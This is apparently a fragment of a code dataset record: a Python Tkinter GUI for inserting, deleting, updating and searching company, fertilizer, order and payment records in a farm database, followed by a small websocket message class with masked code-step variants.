sql=\"INSERT INTO company values(%s,%s,%s);\"\n vals=e1.get(),e2.get(),e3.get()\n cur.executemany(sql,[vals])\n db.commit()\n company()\n except:\n insert_company()\ndef delete_company():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Company Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n 
e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=company)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=delete_company_command)\n Button.place(x=400, y=400)\n\n\ndef delete_company_command():\n try:\n sql=\"DELETE FROM company WHERE c_id=%s;\"\n cur.execute(sql,[int(e1.get())])\n db.commit()\n company()\n except:\n l=Label(root,text='Invalid Entry',font=('times new roman',15))\n l.place(x=100,y=300)\n\ndef update_company():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Company Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=update_c)\n\n Button.place(x=300, y=400)\n\ndef update_c():\n try:\n global e1,e2,e3,e4,e5,e6\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n sql='SELECT * FROM company WHERE c_id=%s;'\n vals=[e1.get()]\n cur.execute(sql,vals)\n\n label=Label(root,text='Company_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Company_name',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Company_address',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n e1=Entry(root)\n e2=Entry(root)\n e3=Entry(root)\n\n data=cur.fetchall()\n arr=[e1,e2,e3]\n count=0\n for val in data[0]:\n arr[count].insert(0,val)\n count+=1\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=110)\n e3.place(x=350,y=210)\n\n label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_c)\n label.place(x=300,y=400)\n\n\n except:\n l=Label(root,text='Invalid Farmer_id',font=('times new roman',15))\n l.place(x=100,y=300)\n update_company()\n\ndef 
update_command_c():\n try:\n sql=\"UPDATE company SET c_name=%s,c_address=%s WHERE c_id=%s;\"\n vals=e2.get(),e3.get(),e1.get()\n cur.executemany(sql,[vals])\n db.commit()\n company()\n except:\n update_company()\ndef search_company():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Company Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=company)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_c)\n Button.place(x=400, y=400)\ndef search_c():\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n try:\n sql='SELECT * FROM company WHERE c_id=%s;'\n val=[e1.get()]\n cur.execute(sql,val)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=company)\n Button.place(x=300, y=400)\n\n for val in cur:\n count=0\n Y=50\n names=['company id: ','company name: ','company address: ']\n for i in val:\n label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')\n label.place(x=10,y=Y)\n Y+=50\n count+=1\n db.commit()\n except:\n l=Label(root,text='Invalid Company Id',font=('times new roman',15))\n l.place(x=100,y=300)\n search_company()\n\n\n\n#fertilizer page\ndef fertilizer():\n global root\n #clean previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Fertilizer Table',font=('Times new roman',15),bg='white')\n label.place(x=350,y=10)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=entity_page)\n Button.place(x=10, y=50)\n\n Button = tk.Button(root, text=\"Insert\", font=(\"Arial\", 15),command=insert_fer)\n Button.place(x=110, y=50)\n\n Button = 
tk.Button(root, text=\"Delete\", font=(\"Arial\", 15),command=delete_fer)\n Button.place(x=210, y=50)\n\n Button = tk.Button(root, text=\"Update\", font=(\"Arial\", 15),command=update_fer)\n Button.place(x=310, y=50)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_fer)\n Button.place(x=410, y=50)\n\n view_fer()\n\n\ndef view_fer():\n frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')\n frame.place(x=10,y=100,width=750,height=400)\n\n x_scroll=Scrollbar(frame,orient=HORIZONTAL)\n y_scroll=Scrollbar(frame,orient=VERTICAL)\n\n table=ttk.Treeview(frame,columns=(\"fe_formula\",'fe_name','fe_content','fe_price','company_id'),xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n\n x_scroll.pack(side=BOTTOM,fill=X)\n y_scroll.pack(side=RIGHT,fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('fe_formula',text=\"Fertilizer Formula\")\n table.heading('fe_name',text=\"Fertilizer name\")\n table.heading('fe_content',text=\"Fertilizer content\")\n table.heading('fe_price',text=\"Fertilizer price\")\n table.heading('company_id',text=\"Company_id\")\n #table.heading('f_address',text=\"Farmer Address\")\n table['show']='headings'\n\n #table.column(\"f_id\",width=100)\n\n\n table.pack()\n\n\n\n cur.execute(\"SELECT * FROM fertilizer;\")\n\n data =cur.fetchall()\n db.commit()\n if len(data)!=0:\n for row in data:\n table.insert('',END,values=row)\n\ne1,e2,e3,e4,e5,e6=0,0,0,0,0,0\ndef insert_fer():\n global e1,e2,e3,e4,e5,e6\n #clean the window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n\n #create the window\n label=Label(root,text='Fertlizer formula',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Fertlizer name',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Fertilizer content',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n 
label=Label(root,text='Fertlizer price',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Company id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n\n e1=Entry(root,width=50)\n e2=Entry(root,width=50)\n e3=Entry(root,width=50)\n e4=Entry(root,width=50)\n e5=Entry(root,width=50)\n #e6=Entry(root,width=50)\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n e3.place(x=350,y=110)\n e4.place(x=350,y=160)\n e5.place(x=350,y=210)\n #e6.place(x=350,y=270)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=fertilizer)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=insert_fer_command)\n Button.place(x=400, y=400)\n\ndef insert_fer_command():\n try:\n sql=\"INSERT INTO fertilizer values(%s,%s,%s,%s,%s);\"\n vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get()\n cur.executemany(sql,[vals])\n db.commit()\n fertilizer()\n except:\n insert_fer()\ndef delete_fer():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Fertilizer formula:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=fertilizer)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=delete_fer_command)\n Button.place(x=400, y=400)\n\n\ndef delete_fer_command():\n try:\n sql=\"DELETE FROM fertilizer WHERE fe_formula=%s;\"\n cur.execute(sql,[e1.get()])\n db.commit()\n fertilizer()\n except:\n l=Label(root,text='Invalid Entry',font=('times new roman',15))\n l.place(x=100,y=300)\n\ndef update_fer():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Fertlizer formula:',font=('Times new 
roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=update_fe)\n\n Button.place(x=300, y=400)\n\ndef update_fe():\n try:\n global e1,e2,e3,e4,e5,e6\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n sql='SELECT * FROM fertilizer WHERE fe_formula=%s;'\n vals=[e1.get()]\n cur.execute(sql,vals)\n\n label=Label(root,text='Fertlizer formula',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Fertlizer name',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Fertlizer content',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Fertlizer price',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='comapny_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n\n e1=Entry(root)\n e2=Entry(root)\n e3=Entry(root)\n e4=Entry(root)\n e5=Entry(root)\n #e6=Entry(root)\n\n data=cur.fetchall()\n arr=[e1,e2,e3,e4,e5,e6]\n count=0\n for val in data[0]:\n arr[count].insert(0,val)\n count+=1\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n e3.place(x=350,y=110)\n e4.place(x=350,y=160)\n e5.place(x=350,y=210)\n #e6.place(x=350,y=270)\n\n label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_fe)\n label.place(x=300,y=400)\n\n\n except:\n l=Label(root,text='Invalid Farmer_id',font=('times new roman',15))\n l.place(x=100,y=300)\n update_fer()\n\ndef update_command_fe():\n\n sql=\"UPDATE fertilizer SET fe_name=%s,fe_content=%s,fe_price=%s,company_id=%s WHERE fe_formula=%s;\"\n vals=e2.get(),e3.get(),e4.get(),e5.get(),e1.get()\n cur.executemany(sql,[vals])\n db.commit()\n fertilizer()\n\ndef search_fer():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new 
roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Fertlizer formula:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=fertilizer)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_fe)\n Button.place(x=400, y=400)\ndef search_fe():\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n try:\n sql='SELECT * FROM fertilizer WHERE fe_formula=%s;'\n val=[e1.get()]\n cur.execute(sql,val)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=fertilizer)\n Button.place(x=300, y=400)\n\n for val in cur:\n count=0\n Y=50\n names=['fertilizer formula: ','fertilizer name: ','fertilizer content: ','fertilizer price: ','company_id: ']\n for i in val:\n label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')\n label.place(x=10,y=Y)\n Y+=50\n count+=1\n db.commit()\n except:\n l=Label(root,text='Invalid Fertilizer formula',font=('times new roman',15))\n l.place(x=100,y=300)\n search_fer()\n\n\n\n#order page\ndef orders():\n global root\n #clean previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Orders Table',font=('Times new roman',15),bg='white')\n label.place(x=350,y=10)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=entity_page)\n Button.place(x=10, y=50)\n\n Button = tk.Button(root, text=\"Insert\", font=(\"Arial\", 15),command=insert_ord)\n Button.place(x=110, y=50)\n\n Button = tk.Button(root, text=\"Delete\", font=(\"Arial\", 15),command=delete_ord)\n Button.place(x=210, y=50)\n\n Button = tk.Button(root, text=\"Update\", font=(\"Arial\", 15),command=update_ord)\n Button.place(x=310, y=50)\n\n Button = tk.Button(root, 
text=\"Search\", font=(\"Arial\", 15),command=search_ord)\n Button.place(x=410, y=50)\n\n view_ord()\n\n\ndef view_ord():\n frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')\n frame.place(x=10,y=100,width=750,height=400)\n\n x_scroll=Scrollbar(frame,orient=HORIZONTAL)\n y_scroll=Scrollbar(frame,orient=VERTICAL)\n\n table=ttk.Treeview(frame,columns=(\"or_id\",'or_date','or_fid','or_formula','or_to'),xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n\n x_scroll.pack(side=BOTTOM,fill=X)\n y_scroll.pack(side=RIGHT,fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('or_id',text=\"Order Id\")\n table.heading('or_date',text=\"Order Date\")\n\n\n table.heading('or_fid',text=\"Ordered Farmer Id\")\n table.heading('or_formula',text=\"Order (item)formula\")\n table.heading('or_to',text=\"Order to\")\n #table.heading('f_address',text=\"Farmer Address\")\n table['show']='headings'\n\n #table.column(\"f_id\",width=100)\n\n\n table.pack()\n\n\n\n cur.execute(\"SELECT * FROM orders;\")\n\n data =cur.fetchall()\n db.commit()\n if len(data)!=0:\n for row in data:\n table.insert('',END,values=row)\n\ne1,e2,e3,e4,e5,e6=0,0,0,0,0,0\ndef insert_ord():\n global e1,e2,e3,e4,e5,e6\n #clean the window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n\n #create the window\n label=Label(root,text='Order Id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Order date',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Order FID',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Order formula',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Order to',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n\n e1=Entry(root,width=50)\n e2=Entry(root,width=50)\n e3=Entry(root,width=50)\n 
e4=Entry(root,width=50)\n e5=Entry(root,width=50)\n #e6=Entry(root,width=50)\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n e2.insert(0,datetime.now())\n e3.place(x=350,y=110)\n e4.place(x=350,y=160)\n e5.place(x=350,y=210)\n #e6.place(x=350,y=270)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=orders)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=insert_ord_command)\n Button.place(x=400, y=400)\n\ndef insert_ord_command():\n try:\n sql=\"INSERT INTO orders values(%s,%s,%s,%s,%s);\"\n vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get()\n cur.executemany(sql,[vals])\n db.commit()\n orders()\n except:\n insert_ord()\ndef delete_ord():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Order Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=orders)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=delete_ord_command)\n Button.place(x=400, y=400)\n\n\ndef delete_ord_command():\n try:\n sql=\"DELETE FROM orders WHERE or_id=%s;\"\n cur.execute(sql,[e1.get()])\n db.commit()\n orders()\n except:\n l=Label(root,text='Invalid Entry',font=('times new roman',15))\n l.place(x=100,y=300)\n\ndef update_ord():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Order Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=update_or)\n\n Button.place(x=300, y=400)\n\ndef update_or():\n try:\n global e1,e2,e3,e4,e5,e6\n #clean\n label=Label(root,text=' 
'*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n sql='SELECT * FROM orders WHERE or_id=%s;'\n vals=[e1.get()]\n cur.execute(sql,vals)\n\n label=Label(root,text='Order Id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Order Date',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Order f_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Order formula',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Order to',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n\n e1=Entry(root)\n e2=Entry(root)\n e3=Entry(root)\n e4=Entry(root)\n e5=Entry(root)\n #e6=Entry(root)\n\n data=cur.fetchall()\n arr=[e1,e2,e3,e4,e5,e6]\n count=0\n for val in data[0]:\n arr[count].insert(0,val)\n count+=1\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n #e2.insert(0,datetime.now())\n e3.place(x=350,y=110)\n e4.place(x=350,y=160)\n e5.place(x=350,y=210)\n #e6.place(x=350,y=270)\n\n label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_ord)\n label.place(x=300,y=400)\n\n\n except:\n l=Label(root,text='Invalid Order_id',font=('times new roman',15))\n l.place(x=100,y=300)\n update_ord()\n\ndef update_command_ord():\n\n sql=\"UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;\"\n vals=e2.get(),e3.get(),e4.get(),e5.get(),e1.get()\n cur.executemany(sql,[vals])\n db.commit()\n orders()\n\ndef search_ord():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Order Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=orders)\n Button.place(x=200, y=400)\n\n Button = 
tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_or)\n Button.place(x=400, y=400)\ndef search_or():\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n try:\n sql='SELECT * FROM orders WHERE or_id=%s;'\n val=[e1.get()]\n cur.execute(sql,val)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=orders)\n Button.place(x=300, y=400)\n\n for val in cur:\n count=0\n Y=50\n names=['order Id: ','Order date: ','Order fid: ','Order formula: ','order to: ']\n for i in val:\n label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')\n label.place(x=10,y=Y)\n Y+=50\n count+=1\n db.commit()\n except:\n l=Label(root,text='Invalid order id',font=('times new roman',15))\n l.place(x=100,y=300)\n search_ord()\n\n\n\n\n#payment page\ndef payment():\n global root\n #clean previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Payment Table',font=('Times new roman',15),bg='white')\n label.place(x=350,y=10)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=entity_page)\n Button.place(x=10, y=50)\n\n Button = tk.Button(root, text=\"Insert\", font=(\"Arial\", 15),command=insert_pay)\n Button.place(x=110, y=50)\n\n Button = tk.Button(root, text=\"Delete\", font=(\"Arial\", 15),command=delete_pay)\n Button.place(x=210, y=50)\n\n Button = tk.Button(root, text=\"Update\", font=(\"Arial\", 15),command=update_pay)\n Button.place(x=310, y=50)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_pay)\n Button.place(x=410, y=50)\n\n view_pay()\n\n\ndef view_pay():\n frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')\n frame.place(x=10,y=100,width=750,height=400)\n\n x_scroll=Scrollbar(frame,orient=HORIZONTAL)\n y_scroll=Scrollbar(frame,orient=VERTICAL)\n\n 
table=ttk.Treeview(frame,columns=(\"trans_id\",'p_f_id','p_date','p_amount','p_method'),xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n\n x_scroll.pack(side=BOTTOM,fill=X)\n y_scroll.pack(side=RIGHT,fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id',text=\"Transaction Id\")\n table.heading('p_f_id',text=\"Farmer Id\")\n\n\n table.heading('p_date',text=\"Payment Date\")\n table.heading('p_amount',text=\"Amount\")\n table.heading('p_method',text=\"Payment Method\")\n #table.heading('f_address',text=\"Farmer Address\")\n table['show']='headings'\n\n #table.column(\"f_id\",width=100)\n\n\n table.pack()\n\n\n\n cur.execute(\"SELECT * FROM payment;\")\n\n data =cur.fetchall()\n db.commit()\n if len(data)!=0:\n for row in data:\n table.insert('',END,values=row)\n\ne1,e2,e3,e4,e5,e6=0,0,0,0,0,0\ndef insert_pay():\n global e1,e2,e3,e4,e5,e6\n #clean the window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n\n #create the window\n label=Label(root,text='Transaction Id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Transaction farmer id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Transaction date',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Transaction amount',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Transaction method',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n\n e1=Entry(root,width=50)\n e2=Entry(root,width=50)\n e3=Entry(root,width=50)\n\n e4=Entry(root,width=50)\n e5=Entry(root,width=50)\n #e6=Entry(root,width=50)\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n #e2.insert(0,datetime.now())\n\n e3.place(x=350,y=110)\n e3.insert(0,datetime.now())\n e4.place(x=350,y=160)\n #e5.place(x=350,y=210)\n e5 = StringVar(root)\n 
e5.set(\"Debit card\") # default value\n\n w= OptionMenu(root, e5, \"Credit Card\", \"UPI\", \"Cheque\",\"Cash\")\n w.place(x=350,y=210)\n\n#mainloop()\n\n #e6.place(x=350,y=270)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=payment)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=insert_pay_command)\n Button.place(x=400, y=400)\n\ndef insert_pay_command():\n try:\n sql=\"INSERT INTO payment values(%s,%s,%s,%s,%s);\"\n vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get()\n cur.executemany(sql,[vals])\n db.commit()\n payment()\n except:\n insert_pay()\ndef delete_pay():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Transaction Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=payment)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=delete_pay_command)\n Button.place(x=400, y=400)\n\n\ndef delete_pay_command():\n try:\n sql=\"DELETE FROM payment WHERE trans_id=%s;\"\n cur.execute(sql,[e1.get()])\n db.commit()\n payment()\n except:\n l=Label(root,text='Invalid Entry',font=('times new roman',15))\n l.place(x=100,y=300)\n\ndef update_pay():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Transaction Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=update_pa)\n\n Button.place(x=300, y=400)\n\ndef update_pa():\n try:\n global e1,e2,e3,e4,e5,e6\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n 
label.place(x=0,y=0)\n\n sql='SELECT * FROM payment WHERE trans_id=%s;'\n vals=[e1.get()]\n cur.execute(sql,vals)\n\n label=Label(root,text='Transaction Id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Farmer_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Transaction date',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Transaction amount',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Transaction method',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n\n e1=Entry(root)\n e2=Entry(root)\n e3=Entry(root)\n e4=Entry(root)\n e5=Entry(root)\n #e6=Entry(root)\n\n data=cur.fetchall()\n arr=[e1,e2,e3,e4,e5,e6]\n count=0\n for val in data[0]:\n if count==5:\n continue\n arr[count].insert(0,val)\n count+=1\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n\n e3.place(x=350,y=110)\n #e3.insert(0,datetime.now())\n e4.place(x=350,y=160)\n #e5.place(x=350,y=210)\n #e6.place(x=350,y=270)\n e5 = StringVar(root)\n e5.set(\"Debit card\") # default value\n\n w= OptionMenu(root, e5, \"Credit Card\", \"UPI\", \"Cheque\",\"Cash\")\n w.place(x=350,y=210)\n\n label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_pay)\n label.place(x=300,y=400)\n\n\n except:\n l=Label(root,text='Invalid Order_id',font=('times new roman',15))\n l.place(x=100,y=300)\n update_pay()\n\ndef update_command_pay():\n\n sql=\"UPDATE payment SET p_f_id=%s,p_date=%s,p_amount=%s,p_method=%s WHERE trans_id=%s;\"\n vals=e2.get(),e3.get(),e4.get(),e5.get(),e1.get()\n cur.executemany(sql,[vals])\n db.commit()\n payment()\ndef search_pay():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window2\n label=Label(root,text='Transaction Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n 
e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=payment)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_pa)\n Button.place(x=400, y=400)\ndef search_pa():\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n try:\n sql='SELECT * FROM payment WHERE trans_id=%s;'\n val=[e1.get()]\n cur.execute(sql,val)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=payment)\n Button.place(x=300, y=400)\n\n for val in cur:\n count=0\n Y=50\n names=['Transaction Id: ','Transaction fid: ','Transaction date: ','Transaction amount: ','Transaction method: ']\n for i in val:\n label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')\n label.place(x=10,y=Y)\n Y+=50\n count+=1\n db.commit()\n except:\n l=Label(root,text='Invalid order id',font=('times new roman',15))\n l.place(x=100,y=300)\n search_pay()\n\n\nFirst_page(root)\nroot.mainloop()\n",
"step-ids": [
46,
47,
52,
53,
66
]
}
|
[
46,
47,
52,
53,
66
] |
class WSCommand:
    """String constants naming the commands of the websocket protocol."""

    # Connection lifecycle commands.
    handshake_hi = 'handshake_hi'
    ping = 'ping'
    pong = 'pong'

    # HTTP-tunnelling commands.
    http_call = 'http_call'
    http_return = 'http_return'
class WSMessage:
    """A single protocol message: a command name plus an optional payload.

    The payload is stored as-is; ``strData``/``dictData`` are convenience
    accessors that only document the expected payload type — they perform
    no conversion or validation.
    """

    # Fix: the original annotated ``data: any`` — ``any`` is the builtin
    # function, not a type, so the annotation was meaningless. The
    # annotation is dropped rather than replaced to avoid a new import.
    def __init__(self, command: str, data=None) -> None:
        self.command = command
        self.data = data

    def strData(self) -> str:
        # NOTE(review): returns the payload unchanged; the caller must
        # ensure it actually is a str.
        return self.data

    def dictData(self) -> dict:
        # NOTE(review): returns the payload unchanged; the caller must
        # ensure it actually is a dict.
        return self.data
|
normal
|
{
"blob_id": "d4621ef378b89490278c09e569f781aef1fcef3f",
"index": 7013,
"step-1": "<mask token>\n\n\nclass WSMessage:\n\n def __init__(self, command: str, data: any=None) ->None:\n self.command = command\n self.data = data\n <mask token>\n\n def dictData(self) ->dict:\n return self.data\n",
"step-2": "<mask token>\n\n\nclass WSMessage:\n\n def __init__(self, command: str, data: any=None) ->None:\n self.command = command\n self.data = data\n\n def strData(self) ->str:\n return self.data\n\n def dictData(self) ->dict:\n return self.data\n",
